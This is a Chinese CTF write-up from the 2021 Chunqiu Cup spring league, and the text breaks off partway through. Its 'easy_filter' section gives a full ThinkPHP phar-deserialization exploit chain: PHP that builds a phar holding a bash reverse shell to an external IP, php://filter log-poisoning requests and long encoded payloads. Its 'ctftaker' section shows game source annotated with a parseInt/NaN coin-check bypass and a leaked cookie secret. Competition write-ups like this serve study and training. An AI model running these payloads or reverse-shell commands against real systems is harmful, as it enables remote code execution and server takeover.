2021年春秋杯春季联赛部分WriteUp


Web

easy_filter

跟国赛那个题很像,就是log文件的格式不大一样,改一改就好

用的RCEpayload:

https://www.freebuf.com/vuls/269882.html

生成phar:

<?php
// Builds a phar whose manifest metadata carries a serialized object graph.
// The archive is inert by itself; the write-up relies on the target unserializing
// that metadata when it touches the file through the phar:// stream wrapper
// (PHP 8.0 stopped unserializing phar metadata automatically, as far as I recall).
// Mitigation on the application side: never feed user-controlled paths to
// file_get_contents()/file_exists()-style calls, and reject the phar:// scheme.

$a = unserialize(urldecode("O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A4%3A%7Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%224ut15m%22%3Bs%3A54%3A%22bash+-c+%27bash+-i+%3E%26+%2Fdev%2Ftcp%2F47.104.134.135%2F2333+0%3E%261%27%22%3B%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%224ut15m%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A9%3A%22%00%2A%00append%22%3Ba%3A1%3A%7Bs%3A6%3A%224ut15m%22%3Ba%3A0%3A%7B%7D%7Ds%3A8%3A%22relation%22%3Bb%3A0%3B%7D%7D%7D"));

$phar = new Phar("phar.phar"); // the file name must end in .phar for the Phar class to write it
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); // minimal stub
$phar->setMetadata($a); // the object graph is stored serialized in the manifest meta-data
$phar->addFromString("test.txt""test"); // one file entry; NOTE(review): the separator between the two arguments appears to have been lost in extraction
// the signature is computed automatically
$phar->stopBuffering();

对phar进行编码

2021年春秋杯春季联赛部分WriteUp
image-20210529150140989

注意这里生成的payload每行结尾有多余的换行符和=,去除一下,然后把+编码成%2b

P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00%2b=00D=00Q=00p=00c=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00m=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00M=00j=00o=00i=00a=00W=00Q=00i=00O=003=001=00z=00O=00j=00I=00x=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00T=00W=009=00k=00Z=00W=00w=00A=00d=002=00l=000=00a=00E=00F=000=00d=00H=00I=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00N=00j=00o=00i=00c=003=00l=00z=00d=00G=00V=00t=00I=00j=00t=009=00c=00z=00o=005=00O=00i=00I=00A=00K=00g=00B=00h=00c=00H=00B=00l=00b=00m=00Q=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=002=00E=006=00M=00D=00p=007=00f=00X=001=00z=00O=00j=00g=006=00I=00n=00J=00l=00b=00G=00F=000=00a=00W=009=00u=00I=00j=00t=00i=00O=00j=00A=007=00f=00X=001=009=00C=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00u=00d=00H=00h=000=00B=00A=00A=00A=00A=00K=00P=00o=00s=00W=00A=00E=00A=00A=00A=00A=00D=00H=005=00/=002=00L=00Y=00B=
00A=00A=00A=00A=00A=00A=00A=00A=00d=00G=00V=00z=00d=00A=00D=00n=00j=00D=00c=00f=00a=00/=00o=00V=00n=00K=00P=00s=00m=00j=00S=00D=00S=00L=00M=00E=00K=00V=00c=00J=00A=00g=00A=00A=00A=00E=00d=00C=00T=00U=00I=00=3D=00

thinkphp的日志文件在runtime/log/202105/29.log,下一步就是在本地调试下,尝试如何去掉多余的字符,只将我们的payload解码成phar文件

先清空日志:

index.php?s=/index/Index/hello&file=php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=/var/www/html/runtime/log/202105/29.log
2021年春秋杯春季联赛部分WriteUp
image-20210529151629284

为了防止多余的等号影响payload的解析,我们这样传参index.php/index/Index/hello?file=

写入我们刚才生成的payload

index.php/index/Index/hello?file=P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00%2b=00D=00Q=00p=00c=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00m=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00M=00j=00o=00i=00a=00W=00Q=00i=00O=003=001=00z=00O=00j=00I=00x=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00T=00W=009=00k=00Z=00W=00w=00A=00d=002=00l=000=00a=00E=00F=000=00d=00H=00I=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00N=00j=00o=00i=00c=003=00l=00z=00d=00G=00V=00t=00I=00j=00t=009=00c=00z=00o=005=00O=00i=00I=00A=00K=00g=00B=00h=00c=00H=00B=00l=00b=00m=00Q=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=002=00E=006=00M=00D=00p=007=00f=00X=001=00z=00O=00j=00g=006=00I=00n=00J=00l=00b=00G=00F=000=00a=00W=009=00u=00I=00j=00t=00i=00O=00j=00A=007=00f=00X=001=009=00C=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00u=00d=00H=00h=000=00B=00A=00A=00A=00A=00K=00P=00o=00s=00W=00A=00E=00A=00A=00A=00A
=00D=00H=005=00/=002=00L=00Y=00B=00A=00A=00A=00A=00A=00A=00A=00A=00d=00G=00V=00z=00d=00A=00D=00n=00j=00D=00c=00f=00a=00/=00o=00V=00n=00K=00P=00s=00m=00j=00S=00D=00S=00L=00M=00E=00K=00V=00c=00J=00A=00g=00A=00A=00A=00E=00d=00C=00T=00U=00I=00=3D=00
2021年春秋杯春季联赛部分WriteUp
image-20210529151654248

生成了如下格式的日志:

---------------------------------------------------------------

[2021-05-29T15:16:44+08:00] 127.0.0.1 GET 127.0.0.1/index.php/index/Index/hello?file=P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00%2b=00D=00Q=00p=00c=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00m=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00M=00j=00o=00i=00a=00W=00Q=00i=00O=003=001=00z=00O=00j=00I=00x=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00T=00W=009=00k=00Z=00W=00w=00A=00d=002=00l=000=00a=00E=00F=000=00d=00H=00I=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00N=00j=00o=00i=00c=003=00l=00z=00d=00G=00V=00t=00I=00j=00t=009=00c=00z=00o=005=00O=00i=00I=00A=00K=00g=00B=00h=00c=00H=00B=00l=00b=00m=00Q=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=002=00E=006=00M=00D=00p=007=00f=00X=001=00z=00O=00j=00g=006=00I=00n=00J=00l=00b=00G=00F=000=00a=00W=009=00u=00I=00j=00t=00i=00O=00j=00A=007=00f=00X=001=009=00C=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00u=00d=00H=00h=000=00B=00A=00A
=00A=00A=00K=00P=00o=00s=00W=00A=00E=00A=00A=00A=00A=00D=00H=005=00/=002=00L=00Y=00B=00A=00A=00A=00A=00A=00A=00A=00A=00d=00G=00V=00z=00d=00A=00D=00n=00j=00D=00c=00f=00a=00/=00o=00V=00n=00K=00P=00s=00m=00j=00S=00D=00S=00L=00M=00E=00K=00V=00c=00J=00A=00g=00A=00A=00A=00E=00d=00C=00T=00U=00I=00=3D=00
[ error ] [2]file_get_contents(P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00+=00D=00Q=00p=00c=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00m=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00M=00j=00o=00i=00a=00W=00Q=00i=00O=003=001=00z=00O=00j=00I=00x=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00T=00W=009=00k=00Z=00W=00w=00A=00d=002=00l=000=00a=00E=00F=000=00d=00H=00I=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00N=00j=00o=00i=00c=003=00l=00z=00d=00G=00V=00t=00I=00j=00t=009=00c=00z=00o=005=00O=00i=00I=00A=00K=00g=00B=00h=00c=00H=00B=00l=00b=00m=00Q=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=002=00E=006=00M=00D=00p=007=00f=00X=001=00z=00O=00j=00g=006=00I=00n=00J=00l=00b=00G=00F=000=00a=00W=009=00u=00I=00j=00t=00i=00O=00j=00A=007=00f=00X=001=009=00C=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00u=00d=00H=00h=000=00B=00A=00A=00A=00A=00K=00P=00o=00s=00W=00A=00E=00A=00A=00A=00A=00D
=00H=005=00/=002=00L=00Y=00B=00A=00A=00A=00A=00A=00A=00A=00A=00d=00G=00V=00z=00d=00A=00D=00n=00j=00D=00c=00f=00a=00/=00o=00V=00n=00K=00P=00s=00m=00j=00S=00D=00S=00L=00M=00E=00K=00V=00c=00J=00A=00g=00A=00A=00A=00E=00d=00C=00T=00U=00I=00=3D=00): failed to open stream: File name too long

经过尝试,将payload修改成如下格式即可正常解码:

payload开头加入俩数字来使得前面的=正常解码,结尾加上a使得最终只出现一个payload

50P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00%2b=00D=00Q=00p=00c=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00m=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00M=00j=00o=00i=00a=00W=00Q=00i=00O=003=001=00z=00O=00j=00I=00x=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00T=00W=009=00k=00Z=00W=00w=00A=00d=002=00l=000=00a=00E=00F=000=00d=00H=00I=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00N=00j=00o=00i=00c=003=00l=00z=00d=00G=00V=00t=00I=00j=00t=009=00c=00z=00o=005=00O=00i=00I=00A=00K=00g=00B=00h=00c=00H=00B=00l=00b=00m=00Q=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=002=00E=006=00M=00D=00p=007=00f=00X=001=00z=00O=00j=00g=006=00I=00n=00J=00l=00b=00G=00F=000=00a=00W=009=00u=00I=00j=00t=00i=00O=00j=00A=007=00f=00X=001=009=00C=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00u=00d=00H=00h=000=00B=00A=00A=00A=00A=00P=00n=00U=00s=00W=00A=00E=00A=00A=00A=00A=00D=00H=005=00/=002=00L=00Y=00
B=00A=00A=00A=00A=00A=00A=00A=00A=00d=00G=00V=00z=00d=00C=00X=00V=00Z=00K=00W=00D=00l=00R=00w=00s=00R=00A=00g=003=00p=001=001=008=00O=00N=00k=002=00U=00P=00O=00w=00A=00g=00A=00A=00A=00E=00d=00C=00T=00U=00I=00=3D=00a

再清空,发送payload

2021年春秋杯春季联赛部分WriteUp
image-20210529151459137
2021年春秋杯春季联赛部分WriteUp
image-20210529152400240

解码

index.php?s=/index/Index/hello&file=php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=/var/www/html/runtime/log/202105/29.log
2021年春秋杯春季联赛部分WriteUp
image-20210529152434435

触发

2021年春秋杯春季联赛部分WriteUp
image-20210529152509697

成功执行,接下来就把命令改成tac /flag就好了

http://eci-2zegz186wmvgj36lmnge.cloudeci1.ichunqiu.com/index.php/index/Index/hello?file=50P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00%2b=00D=00Q=00p=00j=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00t=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00O=00T=00o=00i=00d=00G=00F=00j=00I=00C=009=00m=00b=00G=00F=00n=00I=00j=00t=009=00c=00z=00o=00y=00M=00T=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00H=00d=00p=00d=00G=00h=00B=00d=00H=00R=00y=00I=00j=00t=00h=00O=00j=00E=006=00e=003=00M=006=00N=00j=00o=00i=00N=00H=00V=000=00M=00T=00V=00t=00I=00j=00t=00z=00O=00j=00Y=006=00I=00n=00N=005=00c=003=00R=00l=00b=00S=00I=007=00f=00X=00M=006=00O=00T=00o=00i=00A=00C=00o=00A=00Y=00X=00B=00w=00Z=00W=005=00k=00I=00j=00t=00h=00O=00j=00E=006=00e=003=00M=006=00N=00j=00o=00i=00N=00H=00V=000=00M=00T=00V=00t=00I=00j=00t=00h=00O=00j=00A=006=00e=003=001=009=00c=00z=00o=004=00O=00i=00J=00y=00Z=00W=00x=00h=00d=00G=00l=00v=00b=00i=00I=007=00Y=00j=00o=00w=00O=003=001=009=00f=00Q=00g=00A=00A=00A=00B=000=00Z=00
X=00N=000=00L=00n=00R=004=00d=00A=00Q=00A=00A=00A=00B=009=007=00L=00F=00g=00B=00A=00A=00A=00A=00A=00x=00%2b=00f=009=00i=002=00A=00Q=00A=00A=00A=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00p=006=00T=00n=00c=00B=00R=00c=007=00o=00Z=00V=00i=00m=00m=005=00n=00c=00l=00W=00t=00J=00y=00W=00w=007=00Q=00I=00A=00A=00A=00B=00H=00Q=00k=001=00C=00a
2021年春秋杯春季联赛部分WriteUp
image-20210529153357667

也可以弹shell

2021年春秋杯春季联赛部分WriteUp
image-20210529175348399

ctftaker

/source有源码

import { createHash } from "crypto";
import { readFileSync } from "fs";
import { resolve } from "path";
import {exit} from "process";

import cookieSession  from "cookie-session";
import express from "express";
import { SessionData } from "express-session";

import * as CONST from "./const";

// Augments express-session's SessionData with the fields this app stores.
// The middleware actually mounted below is cookie-session, so all of these
// fields travel client-side in a signed cookie rather than in server memory.
declare module "express-session" {
  interface SessionData {
    history: string[];        // accumulated log lines returned by /his
    monster: SerializedObj[]; // remaining opponents; index 0 is the next one
    player: SerializedObj;    // the player's current stats
    coin: number;             // currency spent by /levelup
    init: boolean;            // set once initSession() has populated the rest
  }
}

// Plain-data shape of an Obj as kept in the session (see Obj.serialize /
// Obj.deserialzie); this is what ends up JSON-encoded in the cookie.
interface SerializedObj {
  ATK: number;    // damage dealt per turn is ATK minus the opponent's DEF
  DEF: number;
  HP: number;
  factor: number; // stat scale; stats are rerolled as factor * Math.random()
  name: string;
}

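class Obj {
  ATK: number;
  DEF: number;
  HP: number;
  factor: number;
  /**
   * @param name   display name (readonly parameter property)
   * @param factor stat scale. Coerced with parseInt(`${factor}`), which reads
   *               the leading digits and ignores the rest, so a string such as
   *               "9999999/0" becomes 9999999 rather than NaN. A strict check
   *               like Number.isSafeInteger(Number(factor)) would reject it.
   * @param ATK    explicit stats, used when defined (deserialization path);
   * @param DEF    otherwise each one is factor * Math.random(), i.e. uniform
   * @param HP     in [0, factor).
   */
  constructor(readonly name: string, factor: number|string, ATK?: number, DEF?: number, HP?: number) {
    this.factor = factor = parseInt(`${factor}`);
    this.ATK = ATK ?? factor * Math.random();
    this.DEF = DEF ?? factor * Math.random();
    this.HP = HP ?? factor * Math.random();
  }
  /**
   * Add parseInt(factor) to the current factor and reroll all three stats.
   * Same lenient parsing as the constructor.
   */
  levepup(factor: number|string) {
    this.factor = factor = this.factor + parseInt(`${factor}`);
    this.ATK = factor * Math.random();
    this.DEF = factor * Math.random();
    this.HP = factor * Math.random();
  }
  /**
   * Turn-based duel; this side attacks first. Damage per hit is
   * attacker.ATK - defender.DEF (a negative value heals) and HP floors at 0.
   * Returns [won, log lines].
   * When neither side's ATK exceeds the other's DEF no HP ever reaches 0, and
   * an unbounded loop here would never return (pinning the single-threaded
   * server); rounds are therefore capped, and a fight that hits the cap
   * counts as lost because the opponent never reached 0.
   */
  fight(obj: Obj): [boolean, string[]] {
    const MAX_ROUNDS = 1000;
    const his: string[] = [`${this.name}${obj.name}发起了对战!`];
    let selfHp = this.HP;
    let objHp = obj.HP;
    his.push(`${this.name} HP:${selfHp}${obj.name} HP:${objHp}`);
    for (let round = 0; round < MAX_ROUNDS; round++) {
      objHp -= this.ATK - obj.DEF;
      objHp = Math.max(objHp, 0);
      his.push(`${this.name}${obj.name}发起攻击!`);
      his.push(`${this.name} HP:${selfHp}${obj.name} HP:${objHp}`);
      if(objHp === 0) break;
      selfHp -= obj.ATK - this.DEF;
      selfHp = Math.max(selfHp, 0);
      his.push(`${obj.name}${this.name}发起攻击!`);
      his.push(`${this.name} HP:${selfHp}${obj.name} HP:${objHp}`);
      if(selfHp === 0) break;
    }
    // Identical to `selfHp > 0` on every terminating path; differs only when
    // the round cap stopped the loop.
    return [objHp === 0 && selfHp > 0, his];
  }
  /** Plain-data copy for storage in the session cookie. */
  static serialize(obj: Obj): SerializedObj {
    return {
      ATK: obj.ATK,
      DEF: obj.DEF,
      HP: obj.HP,
      factor: obj.factor,
      name: obj.name,
    };
  }
  /** Inverse of serialize(); stats are taken as stored, not rerolled. */
  static deserialzie(obj: SerializedObj): Obj {
    return new Obj(obj.name, obj.factor, obj.ATK, obj.DEF, obj.HP);
  }
}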

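const app = express();
app.use(express.static(resolve("static")));
app.use(express.json());
app.use(express.urlencoded({extended: true}));
// Cookie-signing secret. md5 of Math.random() is not a cryptographic secret
// (Math.random() is not a CSPRNG); crypto.randomBytes would be the usual choice.
const secret = createHash("md5").update(`${Math.random()}`).digest("hex");
app.use(cookieSession({
  secret: secret,
  name: "session",
}));

// The secret is written to stdout: whoever can read the process log can sign
// arbitrary session cookies (player stats, coin and monster list all live there).
console.log(secret);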

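/**
 * Populate a fresh session once (guarded by session.init) and always return
 * true; the `session is SessionData` predicate only narrows the type for the
 * route handlers, nothing is validated here. Every field set below is later
 * read back from the client-held cookie, so its integrity rests on the
 * cookie signature alone.
 */
function initSession(session: any): session is SessionData {
  if(!session.init) {
    session.history = [];
    // Stored in the same plain-data form as the monsters (previously the raw
    // Obj instance was stored; it JSON-encodes to the same fields).
    session.player = Obj.serialize(new Obj("Player", 0));
    session.coin = 1;
    session.init = true;
    session.monster = [
      Obj.serialize(new Obj("BabyCalc", 1)),
      Obj.serialize(new Obj("MediumCalc", 2)),
      Obj.serialize(new Obj("HardCalc", 5)),
      Obj.serialize(new Obj("GodCalc", 10)),
      Obj.serialize(new Obj("ImpossibleCalc", 100)),
      Obj.serialize(new Obj("TotalImpossibleCalc", 1000)),
      Obj.serialize(new Obj("????????Calc", 10000)),
    ];
  }
  return true;
}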

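// Every request: lazily populate the session, then continue.
app.use((req, res, next) => {
  initSession(req.session);
  next();
});

// Full fight/level-up history of this session, one entry per line.
app.get("/his", (req, res) => {
  if(!initSession(req.session)) return;
  res.send({
    message: req.session.history.join("\n"),
  });
});

app.get("/start", (req, res) => {
  if(!initSession(req.session)) return;
  req.session.history = req.session.history.concat(CONST.banner);
  res.send({
    message: CONST.banner.join("\n"),
  });
});

// Spend f coins to raise the player's factor by f.
app.post("/levelup", (req, res) => {
  if(!initSession(req.session)) return;
  const {f} = req.body;
  // f is used exactly as it arrived in the body: no type or integer check.
  // For a string such as "9999999/0", `f > coin` is NaN > 1 === false, so the
  // guard passes, `coin -= f` leaves coin as NaN (every later guard is false
  // too), and levepup() parseInt()s the string to 9999999.
  // A strict check would be:
  //   const f = Number(req.body.f);
  //   if (!Number.isSafeInteger(f) || f < 1 || f > req.session.coin) { ... }
  if(!f || f > req.session.coin) {
    return res.send({message: "不大对呢"});
  }
  req.session.coin -= f;
  const player = Obj.deserialzie(req.session.player);
  // Cap is tested against the factor *before* this level-up, so one more
  // level-up is allowed once factor has already reached 50.
  if(player.factor > 50) {
    return res.send({message: "你太强了,寻找更多的机遇吧"});
  }
  player.levepup(f);
  req.session.player = Obj.serialize(player);
  const msg = `${player.name}使用了${f}枚硬币升级了自己
  现在的状态:ATK:${player.ATK},DEF:${player.DEF},HP:${player.HP},COIN:${req.session.coin}枚,还剩${req.session.monster.length}个题`
    .split("\n");
  req.session.history = req.session.history.concat(msg);
  res.send({message: msg.join("\n")});
});

// Describe the next opponent (index 0 of the remaining list).
app.get("/monster", (req, res) => {
  if(!initSession(req.session)) return;
  if(req.session.monster.length===0) {
    return res.send({message: CONST.footer.join("\n")});
  }
  const monster = Obj.deserialzie(req.session.monster[0]);
  res.send({
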